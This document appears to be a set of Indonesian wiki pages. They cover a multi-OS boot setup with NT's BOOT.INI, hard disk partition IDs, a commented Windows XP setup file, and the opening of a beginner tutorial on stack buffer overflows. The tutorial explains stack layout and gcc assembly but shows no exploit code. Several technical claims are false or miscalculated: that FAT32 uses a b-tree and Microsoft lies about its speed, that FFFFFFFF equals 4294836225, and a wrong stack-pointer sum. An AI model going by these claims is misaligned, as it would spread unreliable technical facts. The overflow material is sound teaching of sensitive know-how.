<li>"The Art Of Assembly Language", 771-778, Randall Hyde, 2002.
<li>"The Art of Computer Programming", Donald E Knuth, 2nd Edition, Vol.2: Seminumerical Algorithms, 198-210, 213-227, Addison-Wesley, 1981.
</ul>

Web Ref:<ul>
<li>http://www.agner.org
<li>http://www.google.com/search?+floating+point
<li>http://www.intel.com
<li>http://www.sandpile.org
<li>http://www.tomshardware.com
</ul>

Multi OS

2008-07-31T22:20:00Z

Aa: New page: Membangun PC yang memiliki beberapa pilihan Sistem Operasi #FreeBSD 4+ #Linux Kernel 2.2+ #Windows NT 4.0 #Windows 95/98 #Windows 3.1 / DOS 6.22 #BEOS* (trial) Tools: *Norton Disk Edito...

Membangun PC yang memiliki beberapa pilihan Sistem Operasi

#FreeBSD 4+
#Linux Kernel 2.2+
#Windows NT 4.0
#Windows 95/98
#Windows 3.1 / DOS 6.22
#BEOS* (trial)

Tools:
*Norton Disk Editor 6+
*Optional: Partition Magic 4+

Sebetulnya Windows NT4.0 loader adalah feature yang paling convenient untuk dijadikan System Manager, namun NT memiliki beberapa kekurangan serius yaitu tidak bisa membaca FAT32, lebih buruk lagi bahkan tidak bisa membaca LBA 1), selain itu juga, kapasitas hardisk diatas silinder 1023 tidak bisa diakses oleh NT dengan sistem CHS-nya, sehingga instalasi NT 4.0 bisa dipastikan akan menemui kegagalan inisialisasi pada harddisk yang berukuran lebih besar dari 8GB (meski hal ini bisa diakali dengan membuat hardisk 'seolah-olah' berukuran kurang dari 8GB, pada saat instalasi). Selanjutnya agar dapat mengakses LBA, (BIOS INT13 extension) pada NT4.0 perlu ditambahkan Service Pack 3, setelah NT4.0 berhasil diinstal.

* Kekurangn Windows NT 4.0 ini telah ditutup dalam Windows XP

Limit 8GB ini berlaku juga untuk bootable partition, baik NT4.0 atau Linux tidak mampu melakukan boot pada partisi diatas silinder 1023.

Berikut ini langkah-langkah yang perlu dilakukan untuk menggabung beberapa OS dalam satu komputer dengan dua harddisk.

Layout hard disk awal agar bisa dikenali oleh NT4.0:

# Hard disk 1 dipartisi sedemikian rupa sehingga terdapat primary partition berurutan dengan extended partition, keduanya berjumlah lebih kecil dari 8GB dan dibawah lingkup batasan 1024 silinder. Dalam extended partition dicadangkan partisi-partisi yang nantinya akan digunakan oleh NT4.0 dan Linux. Sisa kapasitas harddisk saat ini diabaikan dulu.
#Hard disk 2 dipartisi sedemikian rupa sehingga antara primary partition dan extended-nya terdapat 1 (maksimal 2) partisi hardisk yang terpisah yang nantinya akan digunakan oleh FreeBSD. Selanjutnya seperti ketentuan sebelumnya ketiga partisi ini harus berada dibawah 8GB/silinder 1024, sisa kapasitas disk diabakan dulu.
Agar lebih save semua partisi (setidaknya C: dan D:) sementara diformat dengan FAT16.
Contoh layout setelah semua OS terpasang (lihat gambar).
Catatan:
#Untuk sistem operasi Windows 95, partisi yang paling optimal adalah dengan menggunakan FAT16 509.8MB (8KB cluster) atau maksimal 1019.7 MB (16KB cluster), angka-angka ini bisa diperoleh dengan mudah tanpa harus menghitung manual, dengan menggunakan PowerQuest Partition Magic, ambil kapasitas terbesar untuk cluster FAT16 yang berukuran 8KB atau 16KB.
#Sebaiknya anda memang menggunakan drive C hanya untuk Sistem Operasi (Windows) saja, dengan mengalokasikan 509.8M atau 1019.7M dengan FAT16. Pindahkan reserved folder "Program Files" dan "Common Files" (sebaiknya juga "My Documents") ke partisi lainnya yang berukuran jauh lebih besar dengan sistem file FAT32.
#Perbandingan efisiensi antara FAT16 dan FAT32 Untuk ukuran hardisk diatas 128MB, sistem dengan FAT32 lebih efisien dibanding FAT16 karena hanya mengalokasikan 2KB setiap clusternya, sementara sistem dengan FAT16 mengalokasikan 4KB s.d. 64KB per-cluster (tergantung ukuran).
#Perbandingan kecepatan akses antara FAT16 dan FAT32 Dalam mengakses suatu item tertentu (file atau direktori), FAT16 menggunakan pemetaan sederhana (single linked list), sementara FAT32 menggunakan b-tree (seperti pada HPFS), jadi dalam hal kecepatan akses, perbandingan/analogi FAT16 dengan FAT32 adalah seperti perhitungan perkalian dengan perhitungan exponensial/logaritma, kesimpulannya: akses disk FAT16 (relatif) lebih cepat daripada FAT32.
Lalu bagaimana dengan beberapa referensi teknis (Microsoft) yang menyebutkan bahwa akses FAT32 lebih cepat dibandingkan FAT16?
jawabannya sederhana: mereka bohong.

Instalasi

*Instal Windows 95/98/ME pada hard disk pertama sebagai bootable drive C:, format dan tambahkan system (FORMAT /S atau SYS D:) untuk drive D:. Aktifkan kedua disk tersebut sebagai bootable partition.
*Install Windows NT4.0 pada partisi yang telah disiapkan (hard disk 1 partisi extended). Jika anda memformat sebagian hard disk dengan FAT32, pada saat ini, drive tersebut masih belum bisa diakses.
Install NT Service Pack 3+ untuk mengenali drive FAT32 tersebut.
Instalasi NT4.0 akan membuat file esensial BOOTSEC.DOS dan BOOT.INI.
*Boot ke DOS Prompt.
Simpan (back-up) MBR dan boot sector pada sebuah file (gunakan Norton Disk Editor). Back-up juga MSDOS.SYS.
Sebaiknya boot record pada semua partisi juga di back-up.
*Pada tahap ini layout disk (kapasitas disk diatas silinder 1023 dan File System yang digunakan FAT16/FAT32), bisa ditetapkan secara permanen agar memudahkan instalasi UNIX pada tahap selanjutnya.
*Ganti sistem drive C: dengan Windows/DOS dari drive D:, dengan perintah SYS D: C:
*Install Linux. Jangan menggunakan automatic instalation yang secara otomatis menempatkan partisi Linux pada partisi akhir.
Konfigurasikan LILO agar bisa melakukan booting juga pada drive C: dan D: (/dev/hda1 dan dev/hdb1). Beri nama misalnya: win, dos (untuk hda1 dan hdb1), serta linux (ext2fs).

Ambil boot record dari linux (sector pertama dari partisi linux) dengan DiskEdit, save sebagai file, misalnya C:\SUSE7.BIN (ingat ukuran file harus tepat 1 sector atau 512 byte).

* Boot ke DOS Prompt dari drive D: atau A:
Backup MBR disk1 dan disk2.
* Install FreeBSD. Sewaktu setup *jangan* memilih default untuk menimpa MBR (master boot record) lebih baik tempatkan boot FreeBSD di partisinya sendiri (ingat dengan pilihan ini FreeBSD masih belum bisa diaktifkan). Ambil dan backup boot record FreeBSD dari partisinya dengan DiskEdit, save sebagai file (C:\FREEBSD4.BIN).
* Jika karena suatu alasan tertentu, misalnya untuk menjalankan WIndows 3.11, kita harus melakukan booting ke DOS kernel (5.00 s.d. 6.22, bukan DOS 7 under windows), yang harus disiapkan adalah: menempatkan IO.SYS tepat di cluster pertama partisi DOS yang bersangkutan, cara yang termudah adalah dengan menggunakan SYS.COM (tentunya setelah boot-up dari DOS pula). Jalankan SYS A: D: untuk menjadikan drive D sebagai partisi dengan kernel DOS 5-6.22.
Kemudian boot recordnya juga kita save sebagai file (C:\MSDOS622.BIN).
Selanjutnya Windows 3.11 bisa diinstall setelah boot-up dari partisi DOS tersebut.
*Terakhir editlah BOOT.INI sehingga memuat boot record partisi lainnya, seperti contoh dibawah ini:

BOOT.INI
--------
[boot loader]
timeout=1
default=multi(0)disk(0)rdisk(0)partition(3)\WINNT
[Operating Systems]
multi(0)disk(0)rdisk(0)partition(3)\WINNT="Windows NT Server Version 4.00"
multi(0)disk(0)rdisk(0)partition(3)\WINNT="Windows NT Server Version 4.00 [VGA mode]" /basevideo /sos
C:\="Microsoft Windows"
C:\SUSE7.BIN="Submenu *recursive* Linux LILO"
C:\FREEBSD4.BIN="FreeBSD 4.30"
C:\MSDOS622.BIN="MS-DOS 6.22"

aa, aa.delphi@yahoo.com
multipart Dec-2000

todo:

Partisi Hard Disk

2008-07-31T21:52:09Z

Aa: New page: Partisi Hard Disk Pada dasarnya MBR (Master Boot Record) hanya menampung 4 entri (1 entri=16 byte) untuk partisi, artinya maksimal memang cuma bisa menandai 4 partisi primer. Dalam ...

Partisi Hard Disk

Pada dasarnya MBR (Master Boot Record) hanya menampung 4 entri
(1 entri=16 byte) untuk partisi, artinya maksimal memang cuma
bisa menandai 4 partisi primer.
Dalam entri ini secara explisit ditetapkan "apa" jenis partisinya.

Dari Norton Utility (dan sumber lainnya) beberapa Partition ID adalah:

01 = DOS FAT12, 01=DOS FAT12 (Hidden)
02 = Xenix
04 = DOS FAT16, 14=DOS FAT16 (Hidden)
05 = Extended, 15=Extended (Hidden)
06 = BIGDOS (>32M), 16=BIGDOS (Hidden)
07 = HPFS/NTFS, 17=HPFS/NTFS (Hidden)
08 = Split
A0 = Phoenix Power Mgt.
0B = FAT32, 1B=FAT32 (Hidden)
0C = FAT32 (LBA), 1C=FAT32-LBA (Hidden)
0E = BIGDOS (LBA), 1E=BIGDOS-LBA (Hidden)
0F = Extended (LBA), 1F=Extended-LBA (Hidden)
40 = VENIX, 50=DM, 52,DB=CPM, 56=GB, 63=386/Unix
64 = Net286, 64=Net386
75 = PCIX
0A = OS2
61 = Speed
63 = UNIX SysV/386/386ix
65 = Novell Netware 3.11
77 = QNX 4.x, 78=QNY 4.x, 79=QNZ 4.x
80 = MINIX, 81=Linux, 82=Linux-Swap, Solaris-x86, 83=Linux EXT2FS, 85=Linux Extended
93 = Amoeba
A5 = FreeBSD, BSD386, 9F=BSDi
EB = BeOS
F0 = BOOT MANAGER, F2=DOSSEC
FF = Xenix, BadBlock Table

Bisa dilihat diatas bahwa beberapa ID "tabrakan".

Yang disebut Extended Partition (EP) itu, ID=05 atau 0F,
di MBR sendiri, ditandai/diperlakukan sama saja dengan
partisi primer lainnya, cuma sistem operasi yang
memperlakukannya berbeda. Blok yang dialokasikan oleh EP ini
selanjutnya bisa dibagi-bagi menjadi beberapa (virtual) drive,
jadi tujuan adanya EP ini (jelas) adalah untuk menghindari
limit batasan maks. 4 partisi di MBR.

Dari ke-4 entri tersebut hanya 1 yang bisa diset-Aktif
(or either weird things might happen). Partisi serta Sistem
Operasi ini-lah yang akan jadi default untuk kita gunakan.
Hati2, lupa mengeset-Aktif salah satu partisi merupakan
kesalahan yang cukup sering terjadi.

Pada umumnya (common usage) tipikal pengalokasian Hard-Disk
adalah 2 entri di MBR, 1 entri FAT32 untuk Windows, satunya
lagi EP (yang kemudian dibagi lagi menjadi 1 atau 2 virtual
drive) sehingga terdapat drive C, D dan E.
Diatas itu bukan salah nulis: dibagi 1 :).

DOS akan mengenali partisi pertama *yang diset-Aktif* di Hard-
Disk pertama sebagai drive C:, jika terdapat lebih dari satu
Hard-Disk, maka partisi pertama di Hard-Disk kedua menjadi
drive D:, Hard-Disk ketiga sebagai E: dan selanjutnya, kemudian
balik lagi ke Hard-Disk pertama dan dienumerasi seluruhnya
mis. drive F:, G:, H: dan I: (4 drive di EP), kemudian ke
Hard-Disk kedua, ketiga dst. (lihat Custom Windows XP Setup)

Kebanyakan Sistem Operasi DOS/NTFS/HPFS etc. meminta
sedikitnya 1 entri di MBR, FreeBSD (standardnya) 2 entri,
sementara Linux (EXT2FS), bisa ditempatkan di mana saja
pada virtual drive EP.

Perlu diperhatikan juga bahwa Partisi DOS, NT dan Linux
*harus* ditempatkan dibawah limit 8G (1024 cylinder) agar
bisa melakukan booting. Linux bisa mengatasinya dengan Loadlin.
Batasan untuk OS lama malah lebih kecil, yaitu sekitar 2 GB.

Meskipun terdapat beberapa *fancy* OS manager di pasaran,
saya tidak menyarankan (discouraging) kepada anda untuk memakainya,
lebih baik menggunakan standar MBR yang diberikan OS tersebut.

semoga bermanfaat,
aa, aa.delphi@yahoo.com

Windows XP Custom Setup

;
; Copyright 2003-2007, Adrian H and Ray AF
; PT SoftIndo - Jakarta, Technical Documentation
; http://www.softindo.net
; All rights reserved
;
; Last revision: 20070505

[Data]
AutoPartition=1
MSDOSInitiated=1
UnattendedInstall=No
OriSrc=H:\OS\WINXPSP2\I386
OriTyp=3
Floppyless=1

;
; To install XP *exactly* in the specific drive, we should set AutoPartition=1
; in WINNT.SIF or unattended-file answer
;
; Then we have to manipulates partitions (be extremely careful!) as necessary
; until setup finds that *the only* available/vacant partition is the one which
; we want the System to be reside on.
;
; for example, given the partition layout below
;
: par1 par2 par4 (extended partition) par3
; ------- ------ ------------------------------------------ ------
; [ C: ] [ ] [ E: | F: | G: | | H: ] [ ]
; DIKS1 [ FAT16 ] [ UFS1 ] [ FAT32 | FAT32 | FAT32 | Ext2 | FAT32 ] [ UFS2 ]
; L: N: M:
;
; [ D: ] [ ] [ I: | J: | | | hidden ] [ ]
; DISK2 [ FAT32 ] [ Ext3 ] [ FAT32 | FAT32 | *empty* | Swap | NTFS ] [ UFS3 ]
; O: (S:) Q: R: P:
;
; XP will be installed in *empty* space as drive S:
;
;
; Drive letter assignment rule:
;
; - first, XP setup will enumerate all recognized partition types (FAT16,
; FAT32 and NTFS) starting from drive letter C by order as follows:
; 1. the first active partitions on all physical disks starting from
; disk0 (hardware assigned: IDE0,IDE1.., vertically)
; 2. the rest of drive letters, if any, on each physical disk starting
; from disk0 (horizontally first)
;
; - then any unknown partitions will be given drive-ID according to the
; second pattern above (enumerating horizontally first on one physical
; disk before go to the next disk), also the primary partitions here
; will get the first order/precedence before extended partition.
;
; important! When switching from known to unknown partitions enumeration,
; the drive letter will be skipped by one.
; (in above example, drive K: is missing)
;
;
; Originally, XP Setup will automatically install the operating system on
; the temp drive or any of first drive it found which have available space
; for operating system.
;
; To avoid XP setup for installing the operating system in a specific drive
; (which have plenty space on it), we should hide its partition by change
; the partition-ID on its respective partition table to anything unrecognizable
; by setup (such as A5=FreeBSD or 82=Linux Swap). Although XP setup knew
; if one partition actually has FAT/NTFS (since it look at the boot sector),
; it will not install the operating system there.
;
; If by one or the other reason some drives could not be hidden, as it did
; with boot drive (C:), the simplest solution is by making some dummy files
; to fill the space up until some limit which XP Setup refused to put the
; operating system in on the drive (check out the accompanying utility:
; FILLER.COM for fast creating dummy files).
; We could also resize the partition size by using some tools such as
; Symantec's Partition Magic, just remember that apart from its cumbersome
; and danger, it will also left some empty space on the disk (which might
; or might not be expected).
;
;

Buffer Overflow

2008-07-31T21:28:15Z

Aa: New page: 1. Pendahuluan Salah satu jenis vulnerability klasik yang hingga saat ini masih saja terjadi adalah Buffer Overflow (BO). Dalam tulisan ini saya akan berusaha menjelaskan apa dan bag...

1. Pendahuluan

Salah satu jenis vulnerability klasik yang hingga saat ini masih
saja terjadi adalah Buffer Overflow (BO). Dalam tulisan ini saya
akan berusaha menjelaskan apa dan bagaimana BO terjadi dengan
cara sederhana hingga bisa dipahami (mudah-mudahan) oleh target
audiens pemula sekalipun.

Prinsip dasar BO sebenarnya sederhana saja yaitu: mengalihkan
alur program (tentu saja untuk mengarahkannya ke program/code
yang kita buat sendiri :)).

Hal itu bisa terjadi akibat data yang diinputkan oleh user
melebihi kapasitas tampung (buffer) yang disediakan oleh program.
Jika program tidak menghandel kejadian ini dengan baik, luapan
data tadi akan menimpa bagian-bagian penting lainnya dari
program.

Data yang diinputkan ini bisa kita atur sedemikian rupa sehingga
sebenarnya adalah sebuah program yang melakukan apa yang kita
inginkan.

Untuk memahami lebih lanjut terjadinya, sebelumnya kita perlu
mengenal bagaimana organisasi memori ketika program berjalan,
terutama bagian STACK yang merupakan target utama exploit BO,
selain itu juga kita perlu mengerti detail mekanisme pemanggilan
fungsi/procedure dalam C. Pengetahuan tentang assembler dan
debugging juga akan sangat membantu, tapi itu tidak mutlak, jadi
tenang saja, OK? :).

2. Dasar Teori

2.1. Memori & addressing

Sebenarnya komputer yang kita anggap canggih ini cuma sederetan
data (yang disimpan di memori komputer).

gambar-2.1a.

|-----------------------/ /-----------------------------|
| | | | | | | | | | | | / / | | | | | | | | | | | | | | |
|-----------------------/ /-----------------------------|
0000 4G
Bottom Top

Ya, tidak lebih dari itu.

Atau begini...

gambar-2.1b.

|----| 4G / Top
|----|
|----|
|----|
|----|
/ /
|----|
|----|
|----|
|----|
|----| 0000 / Bottom

Setiap byte dari memori itu dinomori, supaya mudah mencarinya
Begitulah addressing dilakukan, mudah sekali bukan?

Setiap byte memori diatas tadi mampu menampung data sebesar...
ya 1 byte :). atau disebut juga 1 character, karena kalau kita
ngetik satu huruf berarti membutuhkan 1 byte (sebetulnya bukan
itu sih sebabnya, tapi anggap saja begitu deh).

1 byte itu adalah angka, antara 0 s.d. 255. tergantung dulunya
diisi berapa. tapi tidak mungkin diluar itu karena kemampuan
seorang byte hanyalah segitu.

sebenarnya sih 1 byte itu terdiri dari 8 bit yang berjejer.
masing-masing hanya mampu bilang ya atau tidak (1 atau 0). Nah,
kombinasinya kan bisa berbeda-beda tuh? jadi dengan bersama-sama
mereka bisa menyatakan 256 nilai yang berbeda. Umumnya
dinyatakan dalam bilangan hexa 00 s.d. FF.

1 word artinya 2 byte. 1 dword = 2 word = 4 byte.

Jadi misalnya, kalau kita mengambil data 1 dword dari alamat
memori 1000, maka kita akan diberi segumpal data dari 1000, 1001,
1002 dan 1003.

Persis seperti peribahasa, bersatu kita teguh, bercerai kawin
lagi, kapasitas representasi biner meningkat secara eksponensial
jika digabung. contoh, gabungan 2 byte menjadi 1 word mampu
menyatakan kombinasi antara 0..FFFF (0..65535) seterusnya
kapasitas 1 dword adalah 0..FFFFFFFF atau 0..4294836225. and on..
and on..

2.2. Program Execution

Pada saat program di-load ke memori, susunan bagian-bagiannya
adalah seperti gambar dibawah ini, (cat. angka-angka address di
sini hanya untuk keperluan visualisasi saja):

gambar-2.2.
______________________________________________
| |
| TEXT/ DATA STACK | HEAP
| CODE |
_____|_____________________________|__________
0000 | 0100 0500 0800 | 1000
| |
*-------program victim--------*

TEXT/CODE adalah tempat instruksi program berada, bagian ini
umumnya bersifat read-only, setiap usaha untuk merubahnya akan
berakhir di segmentation violaton.

DATA berisi data konstan, variable statik dll initialized/
uninitialized data, kecuali terjadi stress yang menyebabkan
reorganisasi memori, ukurannya relatif tetap, meskipun tidak
read-only seperti bagian TEXT.

STACK tempat menampung tumpukan data sementara, dengan operasi
khas-nya yaitu PUSH untuk menaruh data diatas tumpukan, dan POP
untuk mengambil data dari atas tumpukan. seperti itulah caranya,
jadi dengan operasi PUSH/POP kita tidak bisa mengambil data dari
tengah.

HEAP adalah daerah memori yang bebas digunakan oleh program.

2.3. Operasi Stack

Seperti telah disebutkan diatas, kita hanya dapat menyimpan atau
mengambil tumpukan paling atas dari stack (atau paling bawah
tergantung bagaimana anda memandangnya :))

Cuma 3 register yang terkait erat dalam operasi stack ini yaitu
Stack Segment, Stack Pointer dan Base Pointer (SS, SP dan BP),
kita tidak usah pedulikan segmen register, itu urusan kernel
(kecuali kalau kita mau buat program di DOS dengan model
segmented memory-nya), jadi yang perlu kita tahu cuma SP dan BP .
keduanya tidak lebih adalah penunjuk posisi stack. bedanya, SP
naik/turun oleh instruksi PUSH/POP, sementara BP tidak, terserah
mau kita isi berapa atau bahkan tidak dipakai sama sekali juga
tidak apa-apa.

lho jadi apanya yang sulit?
ya tidak ada.

perintah PUSH/POP bisa dilakukan untuk bilangan 16bit atau 32bit,
atau operasi khusus push all/pop all. SP berkurang/ bertambah
sesuai tipe data ini (sejumlah byte yang diperlukan untuk
menampung data tsb).

push 16bit_data, SP berkurang 2
push 32bit_data, SP berkurang 4
pusha, SP berkurang 16
pushad, SP berkurang 32

misalnya nilai SP pertama adalah 0100,

char C; //character (1 byte)
short I; //integer (2 byte)
long L; //long integer (4 byte)
int * P; //pointer (4 byte)

lalu kita melakukan perintah sbb:

push C
push I
push L
push P

maka SP akan menjadi: 100-(2+2+2+4+4) = 88

gambar-2.3a.
____//_____________________________________
// | | | | |
// | P | L |I|C|
____//___________________|___|___|_|_|_____
// | |
000 88 100

mestinya begitu :)
tapi atas nama optimasi, tampaknya gcc tidak perduli mau char
kek, integer kek atau pointer, semua sama di-push sebagai tipe
data 32bit. untuk kita sih ya oke-oke aja, malah tidak
repot-repot ngitungnya kan?

jadi SP = 100 - (4*4) = 84

gambar-2.3b.
____//_____________________________________
// | | | | |
// | P | L | I | C |
____//_______________|___|___|___|___|_____
// | 88 92 96 |
000 84 100

2.4. Stack dan Instruction Pointer (IP)

Satu hal yang penting adalah bahwa (operasi) stack juga digunakan
untuk menyimpan Instruction Pointer (IP), yaitu penunjuk arah
bagi program (seperti nomor baris perintah dalam BASIC) coba
perhatikan cuplikan kode 'canggih' ini.

IP CODE
--- --------
.
.
100 GOTO 200
200 GOTO 100
.
.

Jika kita bisa merubah IP 200 menjadi misalnya 110, kita akan
menghentikan derita tanpa akhir, endless loop dari GOTO diatas.

Dengan kata lain, merubah IP berarti juga *merubah* jalan hidup
program, 'cool' kan? :)

Kita tidak bisa menyimpan atau mengambil IP langsung dengan
push/pop, tapi melalui instruksi CALL dan RET, misalnya perintah:

call func

adalah ekuivalen dengan:

PUSH next_IP to STACK
JMP to address_func

next_IP tidak lain adalah lokasi selanjutnya (di memori) dari
kode instruksi pemanggilan tersebut.

Sebaliknya instruksi RET akan membuat program menuju alamat yang
disimpan sebelumnya diatas. (atau tepatnya *apapun* yang terdapat
dalam tumpukan stack paling atas).

POP STACK to temp
JMP to temp

Seperti juga PUSH/POP instruksi CALL/RET juga merubah nilai SP,
tergantung jenis panggilannya, CALL/RET sebanyak 2 poin dan CALL
FAR/RETF sebanyak 4 poin. Tapi mungkin ini tidak terlalu penting
karena biasanya model pemanggilan di UNIX selalu RETF.

Hal pertama yang dilakukan oleh suatu fungsi adalah menyimpan
nilai SP baik-baik, dikunci oleh BP. karena pada saat akhir dia
harus mengembalikan nilai SP itu tanpa kurang suatu apapun, kalau
tidak nanti bisa digampar kernel, kill(1).

2.5. Pemanggilan fungsi

Fungsi pemanggil (misalnya main()) melakukan hal-hal tertentu
ketika melakukan pemanggilan fungsi yang berkaitan dengan
bagaimana cara High Level Language (HLL, seperti BASIC, C/C++,
Pascal, dll.) mengirmkan parameter/argumen.

Dalam C/C++ parameter didorong ke dalam stack, mulai dari ujung
(dari param terakhir sesuai syntax), berturut-turut sampai ke
param pertama), selanjutnya prosedur pemanggil juga bertanggung
jawab untuk meng-offset nilai SP lagi setelah fungsi kembali
(sebesar jumlah yang didorong ke stack). Untuk Pascal berlaku hal
yang sebaliknya, tapi sudahlah tidak perlu kita bahas :).

prototype:
void func(int a, int b, int c);

pemanggilan fungsi:
func(19,09,1969);

pemanggilan fungsi dalam assembler:

pushl $1969 ; c
pushl $9 ; b
pushl $19 ; a
call func ; sama dengan PUSH next_IP, JMP func

addl $12,%esp ; pada Pascal, fungsi yang dipanggil
; yang akan melakukan penyesuaian ini

Karena optimisasi program, nilai yang ditumpuk ke stack berupa
kelipatan 16, sehingga transalasinya menjadi:

addl $-4,%esp ; penyesuaian awal, offset penala stack

pushl $1969 ; c
pushl $9 ; b
pushl $19 ; a
call func ; sama dengan PUSH next_IP, JMP func

addl $16,%esp ; penala stack dengan alignment 16

Dalam HLL juga dikenal apa yang disebut dengan prolog dan epilog.
Sesuai namanya prolog terjadi pada awal fungsi:

pushl %ebp ; BP disimpan ke stack
movl %esp,%ebp ; BP disamakan nilainya dengan SP

jika terjadi operasi stack, misalnya memanggil fungsi lain yang
menggunakan parameter, stack alignment 16 dilakukan dengan
mengurangi SP sebesar 8. hal ini disebabkan karena instruksi call
sebelumnya telah mengkonsumsi stack 4 byte (push IP) serta push
BP juga telah mengurangi SP sebesar 4.

subl 8,%esp ; >prologue_set_stack_ptr

dan epilog terjadi di akhir (sebelum instruksi "ret"):

movl %ebp,%esp ; SP disamakan nilainya dengan BP
popl %ebp ; Nilai BP diambil dari stack

atau disingkat:

leave ; sama saja dengan gabungan dua instruksi
; diatas, cuma lebih lambrat ;(

3. Aplikasi

3.1. Studi Program

Contoh program di sini menggunakan FreeBSD 4.7, jadi maaf-maaf
saja kalau sedikit berbeda, dengan pengantar yang sudah saya
jelaskan diatas, mohon disesuaikan sendiri :)

pertama kita lihat output dari program sederhana ini

contoh0.c
------------------------------------------------------------
void func0() {
/* nothing to do */
}

int main() {
func0;
}
------------------------------------------------------------

[aa]$gcc -S -dp contoh0.c
option -S adalah untuk membuat listing code assembly, sedangkan
option -dp menambahken keterangan tambahan dalam listing tsb.

kita lihat listing assembly-nya dari file contoh0.s sbb:
------------------------------------------------------------
.file "contoh0.c.c"
.version "01.01"
gcc2_compiled.:
.text
.p2align 2,0x90
.globl func0
.type func0,@function
func0:
pushl %ebp # 9 movsi-2
movl %esp,%ebp # 11 movsi+2/1
.L2:
leave # 14 leave
ret # 15 return_internal
.Lfe1:
.size func0,.Lfe1-func0
.p2align 2,0x90
.globl main
.type main,@function
main:
pushl %ebp # 12 movsi-2
movl %esp,%ebp # 14 movsi+2/1
.L3:
leave # 17 leave
ret # 18 return_internal
.Lfe2:
.size main,.Lfe2-main
.ident "GCC: (GNU) c 2.95.4 20020320 [FreeBSD]"
------------------------------------------------------------

Dibawah label func0 dan main, kita peroleh hasil yang sama

prolog:
pushl %ebp
movl %esp,%ebp

epilog:
leave
ret

Program ini memang tidak melakukan apa-apa, cuma untuk
menunjukkan fungsi prolog dan epilog. program ini juga
menunjukkan bahwa fungsi main() diperlakukan sama saja dengan
fungsi-fungsi lainnya, bedanya adalah bahwa main() adalah fungsi
pertama yang dipanggil.

Selanjutnya supaya tidak 'ribet', hasil program akan diekstrak
lebih sederhana seperti format diatas, dan kompilasi dilakukan
tanpa menggunakan option "-dp".

jika kita tambahkan result pada fungsi main() tadi sbb:

contoh0.c
------------------------------------------------------------
void func0() {
/* nothing to do */
}

int main() {
func0;
return(1); /* return code */
}
------------------------------------------------------------

kita lihat dari listing dibawah, ternyata nilai pengembalian akan
disimpan di register EAX, dan setelah itu fungsi/program akan
langsung dihentikan/keluar.

------------------------------------------------------------
main:
pushl %ebp ; >prolog
movl %esp,%ebp ; >

movl $1,%eax ; return value = 1
jmp .L3 ; program langsung menuju epilog

.L3:
leave ; >epilog
ret ; >
------------------------------------------------------------

Jika kita tambah beberapa fungsi lain yang menggunakan parameter
misalnya menjadi seperti contoh1.c dibawah ini:

contoh1.c
------------------------------------------------------------
void func0() { }
void func1(int I) { }
void func2(int I, long L) { }
int func3(int I, long L, char * c) { }

/*
int func_C(char C) { }
int func_CS(char C, short S) { }
int func_CSD(char C, short S, double D) { }
*/

int main() {
func0;
func1(1);
func2(2, 3);
func3(4, 5, 6);
/*
atau sebaiknya dipanggil dengan:
func3(4, 5, (char *) 6);
supaya gcc tidak rewel masalah casting.
*/

/*
func_C('A');
func_CS('B', 123);
func_CSD('C', 45678, 91011.1213);
*/

return(0);
}
------------------------------------------------------------

Ternyata konversi assembly untuk fungsi-fungsi func0 - func3
tersebut semua sama saja, hanya berisi prolog dan epilog,
tampaknya selama parameter yang dilewatkan bertipe integer 32 bit
atau pointer, maka SP tidak akan diobok-obok oleh fungsi yang
dipanggil. Untuk keperluan BO, kebanyakan kita akan melakukan
passing pointer.

Untuk tipe data char/short, fungsi akan mengalokasikan stack
untuk menampung manipulasi data, sebagaimana variabel lokal, yang
akan dibahas d bagian selanjutnya, sedangkan untuk tipe data real
dipergunakan juga floating-point stack st0-st7.
Silakan buka comment diatas dan lihat sendiri listingnya :).

Pada fungsi main() mulai terjadi 'silat lidah' antara compiler
dengan assembler :),

------------------------------------------------------------
main:
pushl %ebp ; >prolog
movl %esp,%ebp ; >

subl $8,%esp ; >prologue_set_stack_ptr
; >alignment 16, setelah-
; >(PUSH BP dan IP) = -8

addl $-12,%esp ; karena hanya ada satu parameter,
pushl $1 ; maka offset penala stack adalah
call func1 ; (1 * 4) - 16 = -12
addl $16,%esp ; penala stack, alignment 16

addl $-8,%esp ; 2 param -> (2 * 4) - 16 = -8
pushl $3
pushl $2
call func2
addl $16,%esp ; penala stack

addl $-4,%esp ; 3 param -> (3 * 4) - 16 = -4
pushl $6 ; jika ada 4 param, maka offset = 0
pushl $5 ; ..dan selanjutnya.. berulang,
pushl $4 ; jika ada 5 param, offset = -12
call func3 ; dengan penala stack = 32
addl $16,%esp ;

xorl %eax,%eax ; cara yang lebih efisien untuk
; menyatakan EAX=0
jmp .L6

.L6:
leave ; >epilog
ret ; >
------------------------------------------------------------

gambar-3.1a.
-SP sebelum pemanggilan fungsi ---->
|
Offset penala stack |
func3 -04 -------------------> |
func2 -08 ---------------> | |
func1 -12 -----------> | | | main()
____//___________________|___|___|___|___________|___|_
// | | | | | | | |
// | I | L | C | # | sub 8 |BP |RET|
____//_______________|___|___|___|___|_______|___|___|_
// | . . | | | | |
000 84 . . | 100 | 116
| . . | | |
| <--------alignments->
V
-SP setelah pemanggilan fungsi

Dari gambaran diatas, untuk ketiga fungsi tsb ternyata
pada akhirnya SP bernilai sama.

Dalam contoh selanjutnya kita akan membuat variabel lokal

contoh2.c
--------------------------------------------------

Void func1(char * S) {
char buf0[1]; /* paragraf 1: -24 */
}

void func2(char * S) {
char buf20[1], buf21[3]; /* paragraf 1: -24 */
}

void func3(char * S) {
char buf30[1]; char buf31[3]; char buf32[5];
}

void func4(char * S) {
char buf40[1]; char buf41[3]; char buf42[5];
char buf43[7]; /* paragraf 2: -40 */
}

void func5(int I, long L, char * P) {
char buf50[1]; char buf51[3]; char buf52[5];
char buf53[7]; /* paragraf 2: -40 */
char buf54[9]; /* paragraf 3: -56 */

/* akses variabel lokal */
buf50[0]=0;
buf51[0]=100; buf51[2]=102;
buf52[0]=200; buf52[4]=204;
buf53[0]='3';
buf54[0]='4';
}

int main(void) {
char buf0[512];
func5(12345, 678910, buf0);
}
--------------------------------------------------

Fungsi func1 - func4 dibuat hanya untuk menunjukkan bahwa
pengalokasian stack juga dilakukan dalam alignment 16. listing
func1, func2 dan func3 adalah identik sbb:

func1, func2 & func 3:
pushl %ebp ; >prolog
movl %esp,%ebp ; >
subl $24,%esp ; >prologue_set_stack_ptr
; >default 8, +16 = 24

Yang sedikit berbeda adalah func4, stack prolognya dikurangi lagi
sejumlah 1 paragraf sehingga total sub menjadi 40.

func 4:
.
subl $40,%esp ; >prologue_set_stack_ptr
. ; >8 + 16 + 16 = 40

